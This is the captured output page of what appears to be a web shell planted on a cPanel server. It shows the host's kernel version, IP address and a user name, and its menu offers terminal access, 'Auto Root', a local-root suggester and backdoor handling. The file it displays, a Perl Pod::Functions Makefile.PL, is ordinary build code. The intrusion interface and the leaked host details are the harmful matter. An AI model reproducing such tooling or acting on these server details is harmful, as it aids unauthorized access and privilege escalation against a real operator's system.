Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
ext /
Pod-Functions /
Delete
Unzip
Name
Size
Permission
Date
Action
blib
[ DIR ]
drwxr-xr-x
2016-10-10 17:37
t
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
Functions.pm
14.01
KB
-rw-r--r--
2016-10-10 17:37
Functions_pm.PL
7.03
KB
-r--r--r--
2014-12-27 11:48
Makefile
23.15
KB
-rw-r--r--
2016-10-10 17:37
Makefile.PL
1.08
KB
-r--r--r--
2014-12-27 11:48
pm_to_blib
0
B
-rw-r--r--
2016-10-10 17:37
Save
Rename
#!perl -w use strict; use ExtUtils::MakeMaker; use File::Spec::Functions; WriteMakefile(NAME => 'Pod::Functions', VERSION_FROM => 'Functions_pm.PL', LICENSE => 'perl', PREREQ_PM => {}, ABSTRACT_FROM => 'Functions_pm.PL', AUTHOR => 'Perl 5 Porters <perlbug@perl.org>', INSTALLDIRS => 'perl', PL_FILES => {}, # Stop EU::MM defaulting this to run our PL PM => {'Functions.pm' => '$(INST_LIBDIR)/Functions.pm'}, clean => {FILES => 'Functions.pm'}, ); # There doesn't seem to be any way to get ExtUtils::MakeMaker to add a # dependency on another file (or target), and as it's using :: rules, not : # rules, then we can't simply add a one line dependency. So we need to provide # the entire thing. Fortunately, the same code in MM_Unix.pm is actually used # for all platforms, so this code below should also be portable: sub MY::postamble { my $pf = catfile(updir, updir, 'pod', 'perlfunc.pod'); return <<"EOT"; all :: Functions.pm \$(NOECHO) \$(NOOP) Functions.pm :: Functions_pm.PL $pf \$(PERLRUN) Functions_pm.PL $pf EOT }